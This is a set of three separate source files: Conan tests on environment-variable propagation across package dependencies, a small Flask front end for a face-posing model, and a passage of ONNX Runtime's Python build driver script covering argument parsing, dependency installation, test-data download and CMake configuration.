self.assertIn("Building LIB_B, VAR2:23", client.out)
self.assertIn("Building LIB_B, VAR3:override", client.out)
self.assertIn("Building LIB_C, VAR1:800", client.out)
self.assertIn("Building LIB_C, VAR2:24", client.out)
self.assertIn("Building LIB_C, VAR3:override", client.out)
client.run("build .")
self.assertInSep("VAR1=>700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertInSep("VAR3=>override*", client.out)
def test_complex_deps_propagation_override(self):
client = TestClient()
# Try injecting some package level ENV in the install, but without priority
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "C", ["B"], {"VAR3": "bestvalue"}, {"VAR1": "700"})
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e LIB_B:VAR3=override")
self.assertIn("Building LIB_A, VAR1:None", client.out)
self.assertIn("Building LIB_A, VAR2:None", client.out)
self.assertIn("Building LIB_A, VAR3:None", client.out)
self.assertIn("Building LIB_B, VAR1:900", client.out)
self.assertIn("Building LIB_B, VAR2:23", client.out)
self.assertIn("Building LIB_B, VAR3:override", client.out)
self.assertIn("Building LIB_C, VAR1:800", client.out)
self.assertIn("Building LIB_C, VAR2:24", client.out)
self.assertIn("Building LIB_C, VAR3:-23", client.out)
client.run("build .")
self.assertInSep("VAR1=>700:800:900", client.out)
self.assertInSep("VAR2=>24:23*", client.out)
self.assertInSep("VAR3=>bestvalue*", client.out)
def mix_path_case_test(self):
client = TestClient()
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libB"
version = "1.0"
def package_info(self):
self.env_info.path = ["path_from_B"]
"""
client.save({"conanfile.py": conanfile})
client.run("create . user/channel")
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libA"
version = "1.0"
requires = "libB/1.0@user/channel"
def package_info(self):
self.env_info.PATH.extend(["path_from_A"])
"""
client.save({"conanfile.py": conanfile})
client.run("create . user/channel")
conanfile = """
[requires]
libA/1.0@user/channel
[generators]
virtualenv
"""
client.save({"conanfile.txt": conanfile}, clean_first=True)
client.run("install .")
info = client.load("conanbuildinfo.txt")
info = info.replace("\r\n", "\n")
self.assertIn("""
[ENV_libA]
PATH=["path_from_A"]
[ENV_libB]
PATH=["path_from_B"]""", info)
if platform.system() != "Windows":
activate = client.load("environment.sh.env")
self.assertIn('PATH="path_from_A":"path_from_B"${PATH+:$PATH}', activate)
else:
activate = client.load("environment.bat.env")
self.assertIn('PATH=path_from_A;path_from_B;%PATH%', activate)
def check_conaninfo_completion_test(self):
"""
consumer -> B -> C
-> D (conditional)
The overwritten environment variables caused by the consumer have to be reflected in B's conaninfo.txt
"""
client = TestClient()
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libC"
version = "1.0"
def package_info(self):
self.env_info.MYVAR = "ValueByLibC"
"""
client.save({"conanfile.py": conanfile})
client.run("export . foo/bar")
conanfile = """
from conans import ConanFile
class LibConan(ConanFile):
name = "libD"
version = "1.0"
def package_info(self):
self.env_info.MYVAR = "ValueByLibD"
"""
client.save({"conanfile.py": conanfile})
client.run("export . foo/bar")
conanfile = """
import os
from conans import ConanFile
class LibConan(ConanFile):
name = "libB"
version = "1.0"
def requirements(self):
if os.environ.get("DEP", None) == "C":
self.requires.add("libC/1.0@foo/bar")
else:
self.requires.add("libD/1.0@foo/bar")
def build_info(self):
self.output.warn("Value of MYVAR: %s" % os.environ["MYVAR"])
"""
client.save({"conanfile.py": conanfile})
client.run("export . foo/bar")
pref = PackageReference.loads("libB/1.0@foo/bar:5fecb9aaf431791c8c06ab146f3451823f982bb8")
# With no overrides, B takes dependency D and the value should be ValueByLibD
client.run("install libB/1.0@foo/bar --build")
self.assertTrue("Value of MYVAR: ValueByLibD")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n\n")) # Not user input env
# B takes dependency C and the value should be ValueByLibC
client.run("install libB/1.0@foo/bar --build -e DEP=C")
self.assertTrue("Value of MYVAR: ValueByLibC")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n\n")) # Not user input env
# Consumer overrides MYVAR, so his conaninfo should have it
client.run("install libB/1.0@foo/bar --build -e MYVAR=ValueByConsumer")
self.assertTrue("Value of MYVAR: ValueByConsumer")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n MYVAR=ValueByConsumer\n"))
# Consumer overrides MYVAR, so his conaninfo should have it, but not the libC, because
# is not a dependency
client.run("install libB/1.0@foo/bar --build -e libB:MYVAR=ValueByConsumer "
"-e libC:MYVAR=OtherValue")
self.assertTrue("Value of MYVAR: ValueByConsumer")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n libB:MYVAR=ValueByConsumer\n"))
# Consumer overrides MYVAR, so his conaninfo should have it, both libB and libD
client.run("install libB/1.0@foo/bar --build -e libB:MYVAR=ValueByConsumer "
"-e libD:MYVAR=OtherValue")
self.assertTrue("Value of MYVAR: ValueByConsumer")
conaninfo = load(os.path.join(client.cache.package_layout(pref.ref).package(pref), CONANINFO))
self.assertTrue(conaninfo.endswith("[env]\n libB:MYVAR=ValueByConsumer\n"
" libD:MYVAR=OtherValue\n")) # Not user input env
def test_conaninfo_filtered(self):
client = TestClient()
# Try injecting some package level ENV in the install, but without priority
self._export(client, "A", [], {}, {"VAR1": "900", "VAR2": "23", "VAR3": "-23"})
self._export(client, "B", ["A"], {}, {"VAR1": "800", "VAR2": "24"})
self._export(client, "B2", ["A"], {}, {"VAR1": "800_2", "VAR2": "24_2"})
self._export(client, "C", ["B", "B2"], {"VAR3": "bestvalue"}, {"VAR1": "700"})
def load_conaninfo(lib):
# Read the LIB_A conaninfo
packages_path = client.cache.package_layout(ConanFileReference.loads("LIB_%s/1.0@lasote/stable" % lib)).packages()
package_path = os.path.join(packages_path, os.listdir(packages_path)[0])
info = ConanInfo.loads(load(os.path.join(package_path, CONANINFO)))
return info
# Test "A" conaninfo, should filter the FAKE_LIB
client.save({"conanfile.py": reuse})
client.run("install . --build missing -e LIB_A:VAR3=override "
"-e GLOBAL=99 -e FAKE_LIB:VAR1=-90 -e LIB_B:VAR2=222 "
"-e LIB_B2:NEWVAR=VALUE -e VAR3=[newappend]")
info = load_conaninfo("A")
self.assertEqual(info.env_values.env_dicts("LIB_A"),
({"VAR3": "override", "GLOBAL": "99"}, {}))
self.assertEqual(info.env_values.env_dicts(""),
({'GLOBAL': '99'}, {'VAR3': ['newappend']}))
info = load_conaninfo("B")
self.assertEqual(info.env_values.env_dicts("LIB_A"), ({'GLOBAL': '99', 'VAR3': "override"},
{}))
self.assertEqual(info.env_values.env_dicts("LIB_B"), ({'GLOBAL': '99', "VAR2": "222"},
{'VAR3': ['newappend']}))
info = load_conaninfo("B2")
self.assertEqual(info.env_values.env_dicts("LIB_A"), ({'GLOBAL': '99', 'VAR3': 'override'},
{}))
self.assertEqual(info.env_values.env_dicts("LIB_B2"), ({'GLOBAL': '99', 'NEWVAR': "VALUE"},
{'VAR3': ['newappend']}))
info = load_conaninfo("C")
self.assertEqual(info.env_values.env_dicts("LIB_B2"), ({'GLOBAL': '99', 'NEWVAR': "VALUE"},
{'VAR3': ['newappend']}))
self.assertEqual(info.env_values.env_dicts("LIB_C"), ({'GLOBAL': '99'},
{'VAR3': ['newappend']}))
# Now check the info for the project
info = ConanInfo.loads(load(os.path.join(client.current_folder, CONANINFO)))
self.assertEqual(info.env_values.env_dicts("PROJECT"), ({'GLOBAL': '99'},
{'VAR3': ['newappend']}))
_, _, buildinfo = TXTGenerator.loads(load(os.path.join(client.current_folder, BUILD_INFO)))
self.assertEqual(buildinfo["LIB_A"].VAR1, ["900"])
def _export(self, client, name, requires, env_vars, env_vars_append=None):
hello_file = """
import os
from conans import ConanFile
class HelloLib%sConan(ConanFile):
name = "LIB_%s"
version = "1.0"
""" % (name, name)
if requires:
hello_file += "\n requires="
hello_file += ", ".join('"LIB_%s/1.0@lasote/stable"' % require for require in requires)
hello_file += """
def package_info(self):
pass
"""
if env_vars:
hello_file += """
%s
""" % "\n ".join(["self.env_info.%s = '%s'" % (name, value)
for name, value in env_vars.items()])
if env_vars_append:
hello_file += """
%s
""" % "\n ".join(["self.env_info.%s.append('%s')" % (name, value)
for name, value in env_vars_append.items()])
hello_file += """
def build(self):
self.output.info("Building %s, VAR1:%s*" % (self.name, os.environ.get("VAR1", None)))
self.output.info("Building %s, VAR2:%s*" % (self.name, os.environ.get("VAR2", None)))
self.output.info("Building %s, VAR3:%s*" % (self.name, os.environ.get("VAR3", None)))
"""
client.save({"conanfile.py": hello_file}, clean_first=True)
client.run("export . lasote/stable")
reuse = '''
import os
from conans import ConanFile
class Hello2Conan(ConanFile):
requires="LIB_C/1.0@lasote/stable"
def build(self):
self.output.info("VAR1=>%s*" % os.environ.get("VAR1"))
self.output.info("VAR2=>%s*" % os.environ.get("VAR2"))
self.output.info("VAR3=>%s*" % os.environ.get("VAR3"))
'''
|
the-stack_106_12938
|
import torch
from manual_poser import ManualPoserApp
from poser.morph_rotate_combine_poser import MorphRotateCombinePoser256Param6
from tha.combiner import CombinerSpec
from tha.face_morpher import FaceMorpherSpec
from tha.two_algo_face_rotator import TwoAlgoFaceRotatorSpec
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/', methods=['POST', 'GET'])
def pose():
cuda = torch.device('cuda')
poser = MorphRotateCombinePoser256Param6(
morph_module_spec=FaceMorpherSpec(),
morph_module_file_name="data/face_morpher.pt",
rotate_module_spec=TwoAlgoFaceRotatorSpec(),
rotate_module_file_name="data/two_algo_face_rotator.pt",
combine_module_spec=CombinerSpec(),
combine_module_file_name="data/combiner.pt",
device=cuda)
if request.method == 'POST':
start_x = request.form.get('start_x')
start_y = request.form.get('start_y')
start_z = request.form.get('start_z')
start_left_eye = request.form.get('start_left_eye')
start_right_eye = request.form.get('start_right_eye')
start_mouth = request.form.get('start_mouth')
end_x = request.form.get('end_x')
end_y = request.form.get('end_y')
end_z = request.form.get('end_z')
end_left_eye = request.form.get('end_left_eye')
end_right_eye = request.form.get('end_right_eye')
end_mouth = request.form.get('end_mouth')
total_frame_number = request.form.get('total_frame_number')
startPose = [float(start_x), float(start_y), float(start_z), float(start_left_eye), float(start_right_eye),
float(start_mouth)]
endPose = [float(end_x), float(end_y), float(end_z), float(end_left_eye), float(end_right_eye),
float(end_mouth)]
if request.method == 'GET':
startPose = [-1.0, -1.0, -1.0, 0, 0, 0]
endPose = [1.0, 1.0, 1.0, 1, 1, 1]
total_frame_number = 24
ManualPoserApp(poser=poser, torch_device=cuda).main_loop(startPose, endPose, int(total_frame_number))
return render_template('index.html')
if __name__ == '__main__':
app.run(debug = True)
|
the-stack_106_12943
|
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import fileinput
import getpass
import glob
import logging
import multiprocessing
import os
import platform
import re
import shutil
import subprocess
import sys
import warnings
import hashlib
from os.path import expanduser
logging.basicConfig(format="%(asctime)s %(name)s [%(levelname)s] - %(message)s", level=logging.DEBUG)
log = logging.getLogger("Build")
class BaseError(Exception):
"""Base class for errors originating from build.py."""
pass
class BuildError(BaseError):
"""Error from running build steps."""
def __init__(self, *messages):
super().__init__("\n".join(messages))
class UsageError(BaseError):
"""Usage related error."""
def __init__(self, message):
super().__init__(message)
def parse_arguments():
parser = argparse.ArgumentParser(description="ONNXRuntime CI build driver.",
usage='''
Default behavior is --update --build --test for native architecture builds.
Default behavior is --update --build for cross-compiled builds.
The Update phase will update git submodules, and run cmake to generate makefiles.
The Build phase will build all projects.
The Test phase will run all unit tests, and optionally the ONNX tests.
Use the individual flags to only run the specified stages.
''')
# Main arguments
parser.add_argument("--build_dir", required=True, help="Path to the build directory.")
parser.add_argument("--config", nargs="+", default=["Debug"],
choices=["Debug", "MinSizeRel", "Release", "RelWithDebInfo"],
help="Configuration(s) to build.")
parser.add_argument("--update", action='store_true', help="Update makefiles.")
parser.add_argument("--build", action='store_true', help="Build.")
parser.add_argument("--clean", action='store_true', help="Run 'cmake --build --target clean' for the selected config/s.")
parser.add_argument("--parallel", action='store_true', help='''Use parallel build.
The build setup doesn't get all dependencies right, so --parallel only works if you're just rebuilding ONNXRuntime code.
If you've done an update that fetched external dependencies you have to build without --parallel the first time.
Once that's done, run with "--build --parallel --test" to just build in parallel and run tests.''')
parser.add_argument("--test", action='store_true', help="Run unit tests.")
# enable ONNX tests
parser.add_argument("--enable_onnx_tests", action='store_true',
help='''When running the Test phase, run onnx_test_running against available test data directories.''')
parser.add_argument("--path_to_protoc_exe", help="Path to protoc exe. ")
parser.add_argument("--download_test_data", action="store_true",
help='''Downloads test data without running the tests''')
parser.add_argument("--test_data_url", help="Test data URL.")
parser.add_argument("--test_data_checksum", help="Test data checksum (MD5 digest).")
# generate documentaiton
parser.add_argument("--gen_doc", action='store_true', help="Generate documentation on contrib ops")
# CUDA related
parser.add_argument("--use_cuda", action='store_true', help="Enable CUDA.")
parser.add_argument("--cuda_version", help="The version of CUDA toolkit to use. Auto-detect if not specified. e.g. 9.0")
parser.add_argument("--cuda_home", help="Path to CUDA home."
"Read from CUDA_HOME environment variable if --use_cuda is true and --cuda_home is not specified.")
parser.add_argument("--cudnn_home", help="Path to CUDNN home. "
"Read from CUDNN_HOME environment variable if --use_cuda is true and --cudnn_home is not specified.")
# Python bindings
parser.add_argument("--enable_pybind", action='store_true', help="Enable Python Bindings.")
parser.add_argument("--build_wheel", action='store_true', help="Build Python Wheel. ")
parser.add_argument("--numpy_version", help="Installs a specific version of numpy "
"before building the python binding.")
parser.add_argument("--skip-keras-test", action='store_true', help="Skip tests with Keras if keras is installed")
# C-Sharp bindings
parser.add_argument("--build_csharp", action='store_true', help="Build C#.Net DLL and NuGet package")
# Build a shared lib
parser.add_argument("--build_shared_lib", action='store_true', help="Build a shared library for the ONNXRuntime.")
# Build ONNX Runtime server
parser.add_argument("--build_server", action='store_true', help="Build server application for the ONNXRuntime.")
parser.add_argument("--enable_server_tests", action='store_true', help="Run server application tests.")
parser.add_argument("--enable_server_model_tests", action='store_true', help="Run server model tests.")
# Build options
parser.add_argument("--cmake_extra_defines", nargs="+",
help="Extra definitions to pass to CMake during build system generation. " +
"These are just CMake -D options without the leading -D.")
parser.add_argument("--x86", action='store_true',
help="Create x86 makefiles. Requires --update and no existing cache CMake setup. Delete CMakeCache.txt if needed")
parser.add_argument("--arm", action='store_true',
help="Create ARM makefiles. Requires --update and no existing cache CMake setup. Delete CMakeCache.txt if needed")
parser.add_argument("--arm64", action='store_true',
help="Create ARM64 makefiles. Requires --update and no existing cache CMake setup. Delete CMakeCache.txt if needed")
parser.add_argument("--msvc_toolset", help="MSVC toolset to use. e.g. 14.11")
parser.add_argument("--android", action='store_true', help='Build for Android')
parser.add_argument("--android_abi", type=str, default='arm64-v8a',
help='')
parser.add_argument("--android_api", type=int, default=27,
help='Android API Level, e.g. 21')
parser.add_argument("--android_ndk_path", default="", help="Path to the Android NDK")
# Arguments needed by CI
parser.add_argument("--cmake_path", default="cmake", help="Path to the CMake program.")
parser.add_argument("--ctest_path", default="ctest", help="Path to the CTest program.")
parser.add_argument("--skip_submodule_sync", action='store_true', help="Don't do a 'git submodule update'. Makes the Update phase faster.")
parser.add_argument("--use_jemalloc", action='store_true', help="Use jemalloc.")
parser.add_argument("--use_openblas", action='store_true', help="Build with OpenBLAS.")
parser.add_argument("--use_mkldnn", action='store_true', help="Build with MKLDNN.")
parser.add_argument("--use_mklml", action='store_true', help="Build with MKLML.")
parser.add_argument("--use_gemmlowp", action='store_true', help="Build with gemmlowp for quantized gemm.")
parser.add_argument("--use_automl", action='store_true', help="Build with AutoML support.")
parser.add_argument("--use_ngraph", action='store_true', help="Build with nGraph.")
parser.add_argument("--use_openvino", nargs="?", const="CPU_FP32",
choices=["CPU_FP32","GPU_FP32","GPU_FP16","VAD-M_FP16","MYRIAD_FP16"], help="Build with OpenVINO for specific hardware.")
parser.add_argument("--use_dnnlibrary", action='store_true', help="Build with DNNLibrary.")
parser.add_argument("--use_nsync", action='store_true', help="Build with NSYNC.")
parser.add_argument("--use_preinstalled_eigen", action='store_true', help="Use pre-installed eigen.")
parser.add_argument("--eigen_path", help="Path to pre-installed eigen.")
parser.add_argument("--use_tvm", action="store_true", help="Build with tvm")
parser.add_argument("--use_openmp", action='store_true', help="Build with OpenMP.")
parser.add_argument("--use_llvm", action="store_true", help="Build tvm with llvm")
parser.add_argument("--use_eigenthreadpool", action="store_true", help="Build with eigenthreadpool")
parser.add_argument("--enable_msinternal", action="store_true", help="Enable for Microsoft internal builds only.")
parser.add_argument("--llvm_path", help="Path to llvm dir")
parser.add_argument("--azure_sas_key", help="Azure storage sas key, starts with '?'")
parser.add_argument("--use_brainslice", action="store_true", help="Build with brain slice")
parser.add_argument("--brain_slice_package_path", help="Path to brain slice packages")
parser.add_argument("--brain_slice_package_name", help="Name of brain slice packages")
parser.add_argument("--brain_slice_client_package_name", help="Name of brainslice client package")
parser.add_argument("--use_nuphar", action='store_true', help="Build with nuphar")
parser.add_argument("--use_tensorrt", action='store_true', help="Build with TensorRT")
parser.add_argument("--tensorrt_home", help="Path to TensorRT installation dir")
parser.add_argument("--use_full_protobuf", action='store_true', help="Use the full protobuf library")
parser.add_argument("--disable_contrib_ops", action='store_true', help="Disable contrib ops (reduces binary size)")
parser.add_argument("--skip_onnx_tests", action='store_true', help="Explicitly disable all onnx related tests")
parser.add_argument("--enable_msvc_static_runtime", action='store_true', help="Enable static linking of MSVC runtimes.")
parser.add_argument("--enable_language_interop_ops", action='store_true', help="Enable operator implemented in language other than cpp")
parser.add_argument("--cmake_generator", choices=['Visual Studio 15 2017', 'Visual Studio 16 2019'],
default='Visual Studio 15 2017', help="Specify the generator that CMake invokes. This is only supported on Windows")
return parser.parse_args()
def resolve_executable_path(command_or_path):
"""Returns the absolute path of an executable."""
executable_path = shutil.which(command_or_path)
if executable_path is None:
raise BuildError("Failed to resolve executable path for '{}'.".format(command_or_path))
return os.path.realpath(executable_path)
def is_windows():
return sys.platform.startswith("win")
def is_ubuntu_1604():
return platform.linux_distribution()[0] == 'Ubuntu' and platform.linux_distribution()[1] == '16.04'
def get_config_build_dir(build_dir, config):
# build directory per configuration
return os.path.join(build_dir, config)
def run_subprocess(args, cwd=None, capture=False, dll_path=None, shell=False, env={}):
log.debug("Running subprocess in '{0}'\n{1}".format(cwd or os.getcwd(), args))
my_env = os.environ.copy()
if dll_path:
if is_windows():
my_env["PATH"] = dll_path + os.pathsep + my_env["PATH"]
else:
if "LD_LIBRARY_PATH" in my_env:
my_env["LD_LIBRARY_PATH"] += os.pathsep + dll_path
else:
my_env["LD_LIBRARY_PATH"] = dll_path
stdout, stderr = (subprocess.PIPE, subprocess.STDOUT) if capture else (None, None)
my_env.update(env)
return subprocess.run(args, cwd=cwd, check=True, stdout=stdout, stderr=stderr, env=my_env, shell=shell)
def update_submodules(source_dir):
run_subprocess(["git", "submodule", "sync", "--recursive"], cwd=source_dir)
run_subprocess(["git", "submodule", "update", "--init", "--recursive"], cwd=source_dir)
def is_docker():
path = '/proc/self/cgroup'
return (
os.path.exists('/.dockerenv') or
os.path.isfile(path) and any('docker' in line for line in open(path))
)
def is_sudo():
return 'SUDO_UID' in os.environ.keys()
def install_apt_package(package):
have = package in str(run_subprocess(["apt", "list", "--installed", package], capture=True).stdout)
if not have:
if is_sudo():
run_subprocess(['apt-get', 'install', '-y', package])
else:
raise BuildError(package + " APT package missing. Please re-run this script using sudo to install.")
def install_ubuntu_deps(args):
'Check if the necessary Ubuntu dependencies are installed. Not required on docker. Provide help output if missing.'
# check we need the packages first
if not (args.enable_pybind or args.use_openblas):
return
# not needed on docker as packages are pre-installed
if not is_docker():
try:
if args.enable_pybind:
install_apt_package("python3")
if args.use_openblas:
install_apt_package("libopenblas-dev")
except Exception as e:
raise BuildError("Error setting up required APT packages. {}".format(str(e)))
def install_python_deps(numpy_version=""):
dep_packages = ['setuptools', 'wheel', 'pytest']
dep_packages.append('numpy=={}'.format(numpy_version) if numpy_version else 'numpy>=1.15.0')
dep_packages.append('sympy>=1.1')
dep_packages.append('packaging')
run_subprocess([sys.executable, '-m', 'pip', 'install', '--trusted-host', 'files.pythonhosted.org'] + dep_packages)
def check_md5(filename, expected_md5):
if not os.path.exists(filename):
return False
hash_md5 = hashlib.md5()
BLOCKSIZE = 1024*64
with open(filename, "rb") as f:
buf = f.read(BLOCKSIZE)
while len(buf) > 0:
hash_md5.update(buf)
buf = f.read(BLOCKSIZE)
hex = hash_md5.hexdigest()
if hex != expected_md5:
log.info('md5 mismatch, expect %s, got %s' % (expected_md5, hex))
os.remove(filename)
return False
return True
#the last part of src_url should be unique, across all the builds
def download_test_data(build_dir, src_url, expected_md5, azure_sas_key):
cache_dir = os.path.join(expanduser("~"), '.cache','onnxruntime')
os.makedirs(cache_dir, exist_ok=True)
local_zip_file = os.path.join(cache_dir, os.path.basename(src_url))
if not check_md5(local_zip_file, expected_md5):
log.info("Downloading test data")
if azure_sas_key:
src_url += azure_sas_key
# try to avoid logging azure_sas_key
if shutil.which('aria2c'):
result = subprocess.run(['aria2c','-x', '5', '-j',' 5', '-q', src_url, '-d', cache_dir])
if result.returncode != 0:
raise BuildError("aria2c exited with code {}.".format(result.returncode))
elif shutil.which('curl'):
result = subprocess.run(['curl', '-s', src_url, '-o', local_zip_file])
if result.returncode != 0:
raise BuildError("curl exited with code {}.".format(result.returncode))
else:
import urllib.request
import urllib.error
try:
urllib.request.urlretrieve(src_url, local_zip_file)
except urllib.error.URLError:
raise BuildError("urllib.request.urlretrieve() failed.")
models_dir = os.path.join(build_dir,'models')
if os.path.exists(models_dir):
log.info('deleting %s' % models_dir)
shutil.rmtree(models_dir)
if shutil.which('unzip'):
run_subprocess(['unzip','-qd', models_dir, local_zip_file])
elif shutil.which('7z'): # 7-Zip
run_subprocess(['7z','x', local_zip_file, '-y', '-o' + models_dir])
elif shutil.which('7za'): # 7-Zip standalone
run_subprocess(['7za', 'x', local_zip_file, '-y', '-o' + models_dir])
else:
#TODO: use python for unzip
log.error("No unzip tool for use")
return False
return True
def setup_test_data(build_dir, configs, test_data_url, test_data_checksum, azure_sas_key):
if test_data_url is not None:
"""Sets up the test data, downloading it if needed."""
if not download_test_data(build_dir, test_data_url, test_data_checksum, azure_sas_key):
raise BuildError("Failed to set up test data.")
# create a shortcut for test models if there is a 'models' folder in build_dir
if is_windows():
src_model_dir = os.path.join(build_dir, 'models')
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
os.makedirs(config_build_dir, exist_ok=True)
dest_model_dir = os.path.join(config_build_dir, 'models')
if os.path.exists(src_model_dir) and not os.path.exists(dest_model_dir):
log.debug("creating shortcut %s -> %s" % (src_model_dir, dest_model_dir))
run_subprocess(['mklink', '/D', '/J', dest_model_dir, src_model_dir], shell=True)
def generate_build_tree(cmake_path, source_dir, build_dir, cuda_home, cudnn_home, tensorrt_home, path_to_protoc_exe, configs, cmake_extra_defines, args, cmake_extra_args):
log.info("Generating CMake build tree")
cmake_dir = os.path.join(source_dir, "cmake")
# TODO: fix jemalloc build so it does not conflict with onnxruntime shared lib builds. (e.g. onnxuntime_pybind)
# for now, disable jemalloc if pybind is also enabled.
cmake_args = [cmake_path, cmake_dir,
"-Donnxruntime_RUN_ONNX_TESTS=" + ("ON" if args.enable_onnx_tests else "OFF"),
"-Donnxruntime_GENERATE_TEST_REPORTS=ON",
"-Donnxruntime_DEV_MODE=" + ("OFF" if args.android else "ON"),
"-DPYTHON_EXECUTABLE=" + sys.executable,
"-Donnxruntime_USE_CUDA=" + ("ON" if args.use_cuda else "OFF"),
"-Donnxruntime_USE_NSYNC=" + ("OFF" if is_windows() or not args.use_nsync else "ON"),
"-Donnxruntime_CUDNN_HOME=" + (cudnn_home if args.use_cuda else ""),
"-Donnxruntime_USE_AUTOML=" + ("ON" if args.use_automl else "OFF"),
"-Donnxruntime_CUDA_HOME=" + (cuda_home if args.use_cuda else ""),
"-Donnxruntime_USE_JEMALLOC=" + ("ON" if args.use_jemalloc else "OFF"),
"-Donnxruntime_ENABLE_PYTHON=" + ("ON" if args.enable_pybind else "OFF"),
"-Donnxruntime_BUILD_CSHARP=" + ("ON" if args.build_csharp else "OFF"),
"-Donnxruntime_BUILD_SHARED_LIB=" + ("ON" if args.build_shared_lib or args.build_server else "OFF"),
"-Donnxruntime_USE_EIGEN_FOR_BLAS=" + ("OFF" if args.use_openblas else "ON"),
"-Donnxruntime_USE_OPENBLAS=" + ("ON" if args.use_openblas else "OFF"),
"-Donnxruntime_USE_MKLDNN=" + ("ON" if args.use_mkldnn else "OFF"),
"-Donnxruntime_USE_MKLML=" + ("ON" if args.use_mklml else "OFF"),
"-Donnxruntime_USE_GEMMLOWP=" + ("ON" if args.use_gemmlowp else "OFF"),
"-Donnxruntime_USE_NGRAPH=" + ("ON" if args.use_ngraph else "OFF"),
"-Donnxruntime_USE_OPENVINO=" + ("ON" if args.use_openvino else "OFF"),
"-Donnxruntime_USE_OPENVINO_BINARY=" + ("ON" if args.use_openvino else "OFF"),
"-Donnxruntime_USE_OPENVINO_SOURCE=OFF",
"-Donnxruntime_USE_OPENVINO_MYRIAD=" + ("ON" if args.use_openvino == "MYRIAD_FP16" else "OFF"),
"-Donnxruntime_USE_OPENVINO_GPU_FP32=" + ("ON" if args.use_openvino == "GPU_FP32" else "OFF"),
"-Donnxruntime_USE_OPENVINO_GPU_FP16=" + ("ON" if args.use_openvino == "GPU_FP16" else "OFF"),
"-Donnxruntime_USE_OPENVINO_CPU_FP32=" + ("ON" if args.use_openvino == "CPU_FP32" else "OFF"),
"-Donnxruntime_USE_OPENVINO_VAD_M=" + ("ON" if args.use_openvino == "VAD-M_FP16" else "OFF"),
"-Donnxruntime_USE_NNAPI=" + ("ON" if args.use_dnnlibrary else "OFF"),
"-Donnxruntime_USE_OPENMP=" + ("ON" if args.use_openmp and not args.use_dnnlibrary and not args.use_mklml and not args.use_ngraph else "OFF"),
"-Donnxruntime_USE_TVM=" + ("ON" if args.use_tvm else "OFF"),
"-Donnxruntime_USE_LLVM=" + ("ON" if args.use_llvm else "OFF"),
"-Donnxruntime_ENABLE_MICROSOFT_INTERNAL=" + ("ON" if args.enable_msinternal else "OFF"),
"-Donnxruntime_USE_BRAINSLICE=" + ("ON" if args.use_brainslice else "OFF"),
"-Donnxruntime_USE_NUPHAR=" + ("ON" if args.use_nuphar else "OFF"),
"-Donnxruntime_USE_EIGEN_THREADPOOL=" + ("ON" if args.use_eigenthreadpool else "OFF"),
"-Donnxruntime_USE_TENSORRT=" + ("ON" if args.use_tensorrt else "OFF"),
"-Donnxruntime_TENSORRT_HOME=" + (tensorrt_home if args.use_tensorrt else ""),
# By default - we currently support only cross compiling for ARM/ARM64 (no native compilation supported through this script)
"-Donnxruntime_CROSS_COMPILING=" + ("ON" if args.arm64 or args.arm else "OFF"),
"-Donnxruntime_BUILD_SERVER=" + ("ON" if args.build_server else "OFF"),
"-Donnxruntime_BUILD_x86=" + ("ON" if args.x86 else "OFF"),
# nGraph and TensorRT providers currently only supports full_protobuf option.
"-Donnxruntime_USE_FULL_PROTOBUF=" + ("ON" if args.use_full_protobuf or args.use_ngraph or args.use_tensorrt or args.build_server or args.gen_doc else "OFF"),
"-Donnxruntime_DISABLE_CONTRIB_OPS=" + ("ON" if args.disable_contrib_ops else "OFF"),
"-Donnxruntime_MSVC_STATIC_RUNTIME=" + ("ON" if args.enable_msvc_static_runtime else "OFF"),
"-Donnxruntime_ENABLE_LANGUAGE_INTEROP_OPS=" + ("ON" if args.enable_language_interop_ops else "OFF"),
]
if args.use_brainslice:
bs_pkg_name = args.brain_slice_package_name.split('.', 1)
bs_shared_lib_name = '.'.join((bs_pkg_name[0], 'redist', bs_pkg_name[1]))
cmake_args += [
"-Donnxruntime_BRAINSLICE_LIB_PATH=%s/%s" % (args.brain_slice_package_path, args.brain_slice_package_name),
"-Donnxruntime_BS_CLIENT_PACKAGE=%s/%s" % (args.brain_slice_package_path, args.brain_slice_client_package_name),
"-Donnxruntime_BRAINSLICE_dynamic_lib_PATH=%s/%s" % (args.brain_slice_package_path, bs_shared_lib_name)]
if args.use_llvm:
cmake_args += ["-DLLVM_DIR=%s" % args.llvm_path]
if args.use_cuda and not is_windows():
nvml_stub_path = cuda_home + "/lib64/stubs"
cmake_args += ["-DCUDA_CUDA_LIBRARY=" + nvml_stub_path]
if args.use_preinstalled_eigen:
cmake_args += ["-Donnxruntime_USE_PREINSTALLED_EIGEN=ON",
"-Deigen_SOURCE_PATH=" + args.eigen_path]
if args.android:
cmake_args += ["-DCMAKE_TOOLCHAIN_FILE=" + args.android_ndk_path + "/build/cmake/android.toolchain.cmake",
"-DANDROID_PLATFORM=android-" + str(args.android_api),
"-DANDROID_ABI=" + str(args.android_abi)]
if path_to_protoc_exe:
cmake_args += ["-DONNX_CUSTOM_PROTOC_EXECUTABLE=%s" % path_to_protoc_exe]
if args.gen_doc:
cmake_args += ["-Donnxruntime_PYBIND_EXPORT_OPSCHEMA=ON"]
else:
cmake_args += ["-Donnxruntime_PYBIND_EXPORT_OPSCHEMA=OFF"]
cmake_args += ["-D{}".format(define) for define in cmake_extra_defines]
if is_windows():
cmake_args += cmake_extra_args
for config in configs:
config_build_dir = get_config_build_dir(build_dir, config)
os.makedirs(config_build_dir, exist_ok=True)
if args.use_tvm:
